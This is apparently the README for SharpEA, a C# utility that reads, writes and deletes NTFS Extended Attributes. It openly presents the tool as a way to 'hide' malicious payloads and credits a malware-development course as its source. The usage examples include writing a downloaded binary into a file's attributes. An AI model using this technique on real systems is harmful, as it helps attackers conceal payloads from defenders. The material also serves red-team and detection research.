C# program to read, write and delete Extended Attributes (EAs) to "hide" malicious payloads within NTFS filesystems.
SharpEA.exe list FILE_PATH
Example:
SharpEA.exe list c:\Windows\System32\kernel32.dll
The payload can be a string, a hexadecimal value or a url to download a file:
SharpEA.exe write FILE_PATH EA_NAME PAYLOAD
Example using a string:
SharpEA.exe write c:\Temp\test.txt EA_name1 RandomString
Example using a hexadecimal value (payload starts with "0x..."):
SharpEA.exe write c:\Temp\test.txt EA_name2 0x4142434445
Example using the content of a downloaded file (payload starts with "http..." or "https..."):
SharpEA.exe write c:\Temp\test.txt EA_name3 http://127.0.0.1:8000/a.bin
SharpEA.exe delete FILE_PATH EA_NAME
Example:
SharpEA.exe delete c:\Temp\test.txt EA_name1
SharpEA.exe clear FILE_PATH
Example:
SharpEA.exe clear c:\Temp\test.txt
This is based on C++ code from Sektor7's Malware Development Advanced - Vol.1 course.